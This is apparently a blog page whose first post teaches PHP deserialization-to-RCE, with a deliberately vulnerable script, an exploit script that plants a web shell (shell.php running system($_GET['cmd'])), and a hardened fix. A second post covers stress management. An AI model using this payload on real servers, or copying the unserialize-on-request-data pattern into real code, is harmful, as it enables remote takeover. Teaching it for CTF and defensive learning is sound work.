PHP Deserialization

Exploiting it to gain remote code execution

PHP deserialization is not something I have much experience of, but having done a CTF recently which required me to exploit PHP deserialization to gain remote access, I realised how straightforward it can be. Through this post, I aim to provide a basic example of a deserialization-to-RCE exploit for those who aren’t familiar with it.

Before I share an example, let’s first review what serialization and deserialization mean. This write-up assumes you have a high-level understanding of object orientation in programming languages.

What is serialization?

Put simply, serialization is a way to turn an object into a string. For example, you may have a user object in PHP that needs to be transmitted over the network to a user’s web browser, so that client-side scripting such as JavaScript can handle the object and read its properties.

Essentially, serialization turns the PHP object into a string, ready for transmitting over a network.

What is deserialization?

Deserialization is very simply the opposite of serialization. It turns a serialized string back into an object.

A vulnerable PHP Script (vuln.php)

I don’t claim to be an expert in serialization, so there may well be other methods which I’m not covering, but I hope to show you an example where it is possible to gain Remote Code Execution.

Consider the following vulnerable code which writes the current time to a text file.


<?php
// Untrusted request data is passed straight to unserialize() below: this is the bug.
$getVar = $_GET['update'];

class timeUpdate {
	public $currentTime = '';
	public $outputFile = 'time.txt';

	public function changeTime() {
		echo 'The time in the file will be updated imminently.';
	}

	// Runs automatically when the object is destroyed (e.g. at script end)
	// and writes $currentTime to whichever file name $outputFile holds.
	public function __destruct() {
		file_put_contents('/home/bootlesshacker/' . $this->outputFile, $this->currentTime);
	}
}

// Whatever object the attacker serialized is reconstructed here.
$timeobject = unserialize($getVar);

$example = new timeUpdate;
$example->currentTime = date("F j, Y, g:i a");
$example->changeTime();


Before we try to work out how to exploit this, let’s understand how this works. The PHP file contains a class called timeUpdate. At the bottom of the script, a new object ($example) is created using the timeUpdate class. The currentTime attribute is then set, and the changeTime function is called. The changeTime function simply echoes a message to advise that the time in the file will be updated imminently.

The __destruct() function is then called, which writes the current time to the file named in the $this->outputFile variable. This function executes because the script has come to an end, and PHP calls the destructor of every remaining object for any required cleanup activity (or, in this case, to write the current time to the required file).

But how can we exploit this?

You may also notice the file contains a line which uses the unserialize function to unserialize an HTTP GET variable ($_GET['update']). Therefore, if we pass a serialized object string in that GET variable, the script will unserialize it and $timeobject will become the object we passed in.

We can exploit this by creating a timeUpdate object locally on our computer.

Let’s create a PHP file on our own computer to create our object.


<?php
// Same class name and property names as in vuln.php, so the serialized
// string maps onto the server's timeUpdate class when it is unserialized.
class timeUpdate {
	public $currentTime = '<?php system($_GET["cmd"]); ?>';
	public $outputFile = 'shell.php';
}

// Serialize the object and URL-encode it so it can be passed in a query string.
echo urlencode(serialize(new timeUpdate));


When we run this file, it creates a new timeUpdate object, sets the currentTime variable to our payload, sets the output file name to shell.php, and then serializes this new object into a string. The serialized string is then URL-encoded so it can safely be placed in a query string.

If we then visit the vulnerable PHP file passing the above value in via the GET parameter, it will create a new file called shell.php with our payload.

http://vulnerable-website.fake/vuln.php?update=OUTPUT FROM OUR SCRIPT

This works because, as the vulnerable PHP script executes, it takes our GET parameter and unserializes it, thereby creating our object within the context of the PHP script. As the script comes to an end, the destruct function of our new object is called. This creates the new file called shell.php containing our payload, which we can then use to get remote code execution.

This is a very basic example of exploiting PHP deserialization. The script you come across will likely have a different function, and you will need to identify what the script is doing in order to assess for any serialization vulnerabilities. I hope though this provides a small insight if you’ve not come across this before.
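As an added example (not the post’s own code), here is a hardened replacement for the unserialize() call in vuln.php: it refuses to instantiate any class from request data and validates the shape of what it decodes. The file path and the expected input format (a serialized array with a single time string) are assumptions.

```php
<?php
// Added example, not code from the original post. Path and input format are assumptions.

// Decode untrusted input without letting it instantiate any class.
// With allowed_classes => false (PHP >= 7.0) every object in the input becomes
// __PHP_Incomplete_Class, whose __destruct()/__wakeup() never run, so the
// timeUpdate destructor chain from the post cannot be triggered.
function decodeUpdate(string $raw): ?string {
    $value = @unserialize($raw, ['allowed_classes' => false]);
    // The script only ever needs a time string: reject anything else.
    if (!is_array($value) || !isset($value['time']) || !is_string($value['time'])) {
        return null;
    }
    // Allow only the characters date("F j, Y, g:i a") can produce.
    if (!preg_match('/^[A-Za-z0-9 ,:]{1,40}$/', $value['time'])) {
        return null;
    }
    return $value['time'];
}

// The file name is fixed server-side; nothing from the request reaches the path.
function writeTime(string $time): void {
    file_put_contents('/home/bootlesshacker/time.txt', $time);
}

// Constructed inputs for demonstration: a timeUpdate object pointing at
// shell.php (payload replaced by a placeholder) and a legitimate update.
$malicious = 'O:10:"timeUpdate":2:{s:11:"currentTime";s:7:"PAYLOAD";s:10:"outputFile";s:9:"shell.php";}';
$legit     = serialize(['time' => date("F j, Y, g:i a")]);

// The object never becomes a timeUpdate, so it is rejected and no destructor runs.
var_dump(decodeUpdate($malicious));
// The plain array passes validation and its time string is returned.
var_dump(decodeUpdate($legit));

// Request handling: fall back to the server's own clock if the input is rejected.
$time = decodeUpdate($_GET['update'] ?? '') ?? date("F j, Y, g:i a");
writeTime($time);
```

If the data only ever travels between the server and its own clients, swapping unserialize() for json_decode() removes the class-instantiation problem entirely.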

Mental Health

My experience of stress

I recently listened to a podcast episode featuring Troy Hunt, hosted by Ushi. If you haven’t heard of Ushi’s podcast before, check it out here: InfosecWhiskey. Aside from talking about whisky, the episode focuses on stress management, especially during the current turbulent circumstances of the COVID pandemic.

By the way, whilst we’re on the topic of whisky, I can recommend a bottle (or two) of Penderyn Madeira. This is a Welsh whisky (my home country); it is very unlike your typical scotch but it’s definitely enjoyable.

Troy explains his own personal experience of stress management when dealing with the acquisition of his haveibeenpwned service, amongst other things. I strongly recommend reading his blog post covering this topic. It’s a very insightful read into his coping mechanisms.

Listening to Troy and Ushi made me consider my own relationship with stress, and how it impacts me each day. As Troy mentions in his blog, talking about emotions and stress isn’t all that common, especially amongst “blokes” – this is why I felt it important to share my experience.

When I take a step back and review how I deal with stress, I have an unhealthy ability to push through stressful situations. I find my anxieties propel me forward rather than hold me back. This happens without me realising.

I consider this to be an unhealthy habit where I’m constantly battling with different stresses of life. Somehow, completely oblivious to how stressed I am, I just keep battling through each situation, taking a toll on my physical and mental health. I only identify I’m in this situation having sustained high stress for several weeks, by which point I’m very close to (or at) the stage of burnout.


The best way I find I manage my stress is by remaining mindful. I’m not referring to meditation (personally, I can’t remain focused enough to benefit from it). What I mean by mindfulness is simply having awareness over your own emotions, and how you react to different situations. It’s only when you have this awareness you can do something about it. This leads me to my next point.


I often find putting situations into perspective is helpful. For example, how many times have you received an e-mail in work which has pissed you off, keeping you in a bad mood for the rest of the day?

In my experience, whilst these little things can be very annoying and stir a lot of emotion, they are often just that – little things. Having perspective over your situation will help you realise how much worse things could be. That’s not to say your situation, emotion or reaction isn’t valid, but it helps you react to your situation more appropriately, and remain more positive.

Is it really worth letting a small event dictate your emotions for the rest of the day?


This is an obvious one – but it’s one we always forget. Find time to focus on yourself, whether it be a hobby or something else. You need something to escape to.

Book paid time off work – and book it in advance so you have something to look forward to. Don’t wait until you’re stressed – this is too late. I’m finding this more important during COVID as I find myself taking less leave as I can’t go on holiday, or leave the house during lock-down.

If you’re working from home, I find it helpful to try to separate my work and life environment. This was really challenging when I previously lived in a one-bed flat, but even taking a walk after work can help create that separation.


I’ve only covered a few of the things I find helpful to manage stress – what works for you may be different, but I’m hoping you can get some insight from this blog post. Don’t forget to read Troy Hunt: Sustaining Performance Under Extreme Stress.